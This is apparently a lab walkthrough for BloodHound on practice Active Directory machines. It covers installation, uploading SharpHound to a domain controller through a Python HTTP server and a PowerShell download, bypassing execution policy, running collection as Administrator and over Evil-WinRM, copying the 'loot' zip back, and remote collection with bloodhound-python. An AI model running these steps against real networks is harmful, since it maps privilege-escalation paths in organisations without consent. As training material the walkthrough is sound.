BloodHound

free room to practice

Bloodhound installation

Bloodhound is already in kali repositories. So use the following command to install it.

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo apt install bloodhound      
[sudo] password for kali: 
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
  binfmt-support fastjar jarwrapper neo4j openjdk-11-jre openjdk-11-jre-headless
Suggested packages:
  fonts-ipafont-gothic fonts-ipafont-mincho fonts-wqy-microhei | fonts-wqy-zenhei fonts-indic
The following NEW packages will be installed:
  binfmt-support bloodhound fastjar jarwrapper neo4j openjdk-11-jre openjdk-11-jre-headless
0 upgraded, 7 newly installed, 0 to remove and 649 not upgraded.
Need to get 221 MB of archives.
After this operation, 578 MB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://kali.cs.nycu.edu.tw/kali kali-rolling/main amd64 binfmt-support amd64 2.2.2-2 [64.0 kB]
Get:2 http://kali.cs.nycu.edu.tw/kali kali-rolling/main amd64 fastjar amd64 2:0.98-7 [80.1 kB]
Get:3 http://kali.cs.nycu.edu.tw/kali kali-rolling/main amd64 jarwrapper all 0.78 [21.8 kB]
Get:4 http://http.kali.org/kali kali-rolling/main amd64 openjdk-11-jre-headless amd64 11.0.20~7-1 [38.2 MB]
Get:5 http://http.kali.org/kali kali-rolling/main amd64 openjdk-11-jre amd64 11.0.20~7-1 [193 kB]                                                                     
Get:6 http://http.kali.org/kali kali-rolling/main amd64 neo4j all 5.2.0+really4.4.16-0kali1 [113 MB]                                                                  
Get:7 http://kali.cs.nycu.edu.tw/kali kali-rolling/main amd64 bloodhound amd64 4.3.1-0kali1 [69.3 MB]                                                                 
Fetched 221 MB in 2min 57s (1,251 kB/s)                                                                                                                               
Selecting previously unselected package binfmt-support.
(Reading database ... 397536 files and directories currently installed.)
Preparing to unpack .../0-binfmt-support_2.2.2-2_amd64.deb ...
Unpacking binfmt-support (2.2.2-2) ...
Selecting previously unselected package fastjar.
Preparing to unpack .../1-fastjar_2%3a0.98-7_amd64.deb ...
Unpacking fastjar (2:0.98-7) ...
Selecting previously unselected package jarwrapper.
Preparing to unpack .../2-jarwrapper_0.78_all.deb ...
Unpacking jarwrapper (0.78) ...
Selecting previously unselected package openjdk-11-jre-headless:amd64.
Preparing to unpack .../3-openjdk-11-jre-headless_11.0.20~7-1_amd64.deb ...
Unpacking openjdk-11-jre-headless:amd64 (11.0.20~7-1) ...
Selecting previously unselected package openjdk-11-jre:amd64.
Preparing to unpack .../4-openjdk-11-jre_11.0.20~7-1_amd64.deb ...
Unpacking openjdk-11-jre:amd64 (11.0.20~7-1) ...
Selecting previously unselected package neo4j.
Preparing to unpack .../5-neo4j_5.2.0+really4.4.16-0kali1_all.deb ...
Unpacking neo4j (5.2.0+really4.4.16-0kali1) ...
Selecting previously unselected package bloodhound.
Preparing to unpack .../6-bloodhound_4.3.1-0kali1_amd64.deb ...
Unpacking bloodhound (4.3.1-0kali1) ...
Setting up fastjar (2:0.98-7) ...
Setting up openjdk-11-jre-headless:amd64 (11.0.20~7-1) ...
update-alternatives: using /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs to provide /usr/bin/jjs (jjs) in auto mode
update-alternatives: using /usr/lib/jvm/java-11-openjdk-amd64/bin/rmid to provide /usr/bin/rmid (rmid) in auto mode
update-alternatives: using /usr/lib/jvm/java-11-openjdk-amd64/bin/pack200 to provide /usr/bin/pack200 (pack200) in auto mode
update-alternatives: using /usr/lib/jvm/java-11-openjdk-amd64/bin/unpack200 to provide /usr/bin/unpack200 (unpack200) in auto mode
Setting up binfmt-support (2.2.2-2) ...
update-binfmts: warning: python3.11 already enabled in kernel.
update-binfmts: warning: llvm-14-runtime.binfmt already enabled in kernel.
update-binfmts: warning: llvm-15-runtime.binfmt already enabled in kernel.
Created symlink /etc/systemd/system/multi-user.target.wants/binfmt-support.service → /lib/systemd/system/binfmt-support.service.
Setting up jarwrapper (0.78) ...
Processing triggers for ca-certificates-java (20230103) ...
done.
Processing triggers for mailcap (3.70+nmu1) ...
Processing triggers for kali-menu (2023.2.3) ...
Processing triggers for desktop-file-utils (0.26-1) ...
Processing triggers for hicolor-icon-theme (0.17-2) ...
Setting up openjdk-11-jre:amd64 (11.0.20~7-1) ...
Processing triggers for man-db (2.11.2-2) ...
Setting up neo4j (5.2.0+really4.4.16-0kali1) ...
Setting up bloodhound (4.3.1-0kali1) ...

Now start new4j console.

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo neo4j console
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
2023-07-29 11:10:52.602+0000 INFO  Starting...
2023-07-29 11:10:53.628+0000 INFO  This instance is ServerId{9c35d36c} (9c35d36c-66eb-4cef-825a-c64aee53f01b)
2023-07-29 11:10:56.849+0000 INFO  ======== Neo4j 4.4.16 ========
2023-07-29 11:11:00.959+0000 INFO  Initializing system graph model for component 'security-users' with version -1 and status UNINITIALIZED
2023-07-29 11:11:00.985+0000 INFO  Setting up initial user from defaults: neo4j
2023-07-29 11:11:00.985+0000 INFO  Creating new user 'neo4j' (passwordChangeRequired=true, suspended=false)
2023-07-29 11:11:01.014+0000 INFO  Setting version for 'security-users' to 3
2023-07-29 11:11:01.030+0000 INFO  After initialization of system graph model component 'security-users' have version 3 and status CURRENT
2023-07-29 11:11:01.045+0000 INFO  Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2023-07-29 11:11:01.512+0000 INFO  Bolt enabled on localhost:7687.
2023-07-29 11:11:04.013+0000 INFO  Remote interface available at http://localhost:7474/
2023-07-29 11:11:04.027+0000 INFO  id: 9DF0E320BCF7376AF159AAF73DE5028C775D19E7B96CDDDAB38577187E5F0965
2023-07-29 11:11:04.028+0000 INFO  name: system
2023-07-29 11:11:04.029+0000 INFO  creationDate: 2023-07-29T11:10:58.11Z
2023-07-29 11:11:04.030+0000 INFO  Started.

neo4j will start at http://localhost:7474/. we need to setup credentials first. So, go there and setup credentials.

username: neo4j

password: neo4j

Now, you can launch bloodhound with your new credentials.

Using sharphound

Locate sharphound location

┌──(kali㉿kali)-[~/Desktop]
└─$ locate SharpHound
/usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe
/usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1
/usr/lib/bloodhound/resources/app/Collectors/DebugBuilds/SharpHound.exe
/usr/lib/bloodhound/resources/app/Collectors/DebugBuilds/SharpHound.pdb
/usr/lib/bloodhound/resources/app/Collectors/DebugBuilds/SharpHound.ps1
/usr/share/metasploit-framework/data/post/SharpHound.exe
/usr/share/metasploit-framework/data/post/powershell/SharpHound.ps1

Copy to the current directory and start python server to transfer the file.

                                                                                                                                                                       
┌──(kali㉿kali)-[~/Desktop]
└─$ cp /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1 .

┌──(kali㉿kali)-[~/Desktop]
└─$ python3 -m http.server          
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Start Powershell - powershell -ep bypass -ep bypasses the execution policy of powershell allowing you to easily run scripts

controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator\Downloads>powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Administrator\Downloads>  

Now download the file to victim machine

(new-object System.Net.WebClient).DownloadFile('http://10.9.88.34:8000/SharpHound.ps1', 'C:\Users\Administrator\Downloads\SharpHou
nd.ps1')

Now run it

PS C:\Users\Administrator\Downloads> .\SharpHound.ps1
PS C:\Users\Administrator\Downloads> Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
2023-07-29T04:38:41.8718961-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2023-07-29T04:38:42.0437804-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProp
s, DCOM, SPNTargets, PSRemote
2023-07-29T04:38:42.0594069-07:00|INFORMATION|Initializing SharpHound at 4:38 AM on 7/29/2023
2023-07-29T04:38:42.3094197-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for CONTROLLER.local : Domain-Controller.CONTROLLER.local
2023-07-29T04:38:42.3718970-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, P
SRemote
2023-07-29T04:38:42.7000320-07:00|INFORMATION|Beginning LDAP search for CONTROLLER.local
2023-07-29T04:38:42.7312767-07:00|INFORMATION|Producer has finished, closing LDAP channel
2023-07-29T04:38:42.7469046-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2023-07-29T04:39:13.5125575-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 101 MB RAM
2023-07-29T04:39:28.1844021-07:00|INFORMATION|Consumers finished, closing output channel
2023-07-29T04:39:28.2312742-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2023-07-29T04:39:28.4344252-07:00|INFORMATION|Status: 104 objects finished (+104 2.311111)/s -- Using 108 MB RAM
2023-07-29T04:39:28.4344252-07:00|INFORMATION|Enumeration finished in 00:00:45.7440402
2023-07-29T04:39:28.5125333-07:00|INFORMATION|Saving cache with stats: 62 ID to type mappings.
 64 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2023-07-29T04:39:28.5281516-07:00|INFORMATION|SharpHound Enumeration Completed at 4:39 AM on 7/29/2023! Happy Graphing!
PS C:\Users\Administrator\Downloads> dir


    Directory: C:\Users\Administrator\Downloads


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/29/2023   4:39 AM          12296 20230729043927_loot.zip
-a----        5/14/2020  11:39 AM        1261832 mimikatz.exe
-a----        5/14/2020  11:41 AM         374625 PowerView.ps1
-a----        7/29/2023   4:36 AM        1308348 SharpHound.ps1
-a----        7/29/2023   4:39 AM           9673 YmM2MWQ1NzYtYWFhYS00MjM1LThjYmQtYTE4ZDM4ZGFiNTFl.bin

Now download it

scp download files

┌──(kali㉿kali)-[~/Desktop]
└─$ scp [email protected]:C:/Users/Administrator/Downloads/20230729043927_loot.zip .
[email protected]'s password: 
20230729043927_loot.zip                                                                                                              100%   12KB  32.6KB/s   00:00    
                                                                                                                                                                       
┌──(kali㉿kali)-[~/Desktop]
└─$ ls
20230729043927_loot.zip  ammartiger.ovpn  lab_ammartiger.ovpn  SharpHound.ps1  smbmap
                                                                                                                               

You can also use sharphound.exe to generate the zip file

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> .\SharpHound.exe -c all
2023-07-30T01:13:52.1347165-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2023-07-30T01:13:52.2910006-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-07-30T01:13:52.3222167-07:00|INFORMATION|Initializing SharpHound at 1:13 AM on 7/30/2023
2023-07-30T01:13:52.6190720-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for htb.local : FOREST.htb.local
2023-07-30T01:13:52.7598374-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-07-30T01:13:53.2442157-07:00|INFORMATION|Beginning LDAP search for htb.local
2023-07-30T01:13:53.3848627-07:00|INFORMATION|Producer has finished, closing LDAP channel
2023-07-30T01:13:53.3848627-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2023-07-30T01:14:23.3726534-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 44 MB RAM
2023-07-30T01:14:39.0465553-07:00|INFORMATION|Consumers finished, closing output channel
2023-07-30T01:14:39.0778054-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2023-07-30T01:14:39.1403068-07:00|INFORMATION|Status: 161 objects finished (+161 3.577778)/s -- Using 50 MB RAM
2023-07-30T01:14:39.1403068-07:00|INFORMATION|Enumeration finished in 00:00:45.9011298
2023-07-30T01:14:39.2184306-07:00|INFORMATION|Saving cache with stats: 118 ID to type mappings.
 118 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2023-07-30T01:14:39.2184306-07:00|INFORMATION|SharpHound Enumeration Completed at 1:14 AM on 7/30/2023! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> ls


    Directory: C:\Users\svc-alfresco\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/30/2023   1:14 AM          18868 20230730011352_BloodHound.zip
-a----        7/30/2023   1:14 AM          19605 MzZhZTZmYjktOTM4NS00NDQ3LTk3OGItMmEyYTVjZjNiYTYw.bin
-a----        7/30/2023   1:12 AM        1061888 SharpHound.exe
-a----        7/30/2023   1:00 AM        1308348 SharpHound.ps1

Analysing data with bloodhound

Now import the downloaded file in bloodhound

Now we can run queries from the analysis section.

Remote collection with bloodhound.py

Install the collector script

sudo apt install bloodhound.py

Now run the script to collect data

┌──(kali㉿kali)-[~/Desktop]
└─$ bloodhound-python -u Administrator -p 'P@$$W0rd' -ns 10.10.96.25 -d controller.local -c all
INFO: Found AD domain: controller.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (controller.local:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: Domain-Controller.CONTROLLER.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 3 computers
INFO: Connecting to LDAP server: Domain-Controller.CONTROLLER.local
INFO: Found 10 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 2 ous
INFO: Found 22 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Desktop-1.CONTROLLER.local
INFO: Querying computer: Desktop-2.CONTROLLER.local
INFO: Querying computer: Domain-Controller.CONTROLLER.local
INFO: Ignoring host Domain-Controller.CONTROLLER.local since its reported name DOMAIN-CONTROLL does not match
INFO: Done in 00M 31S

Last updated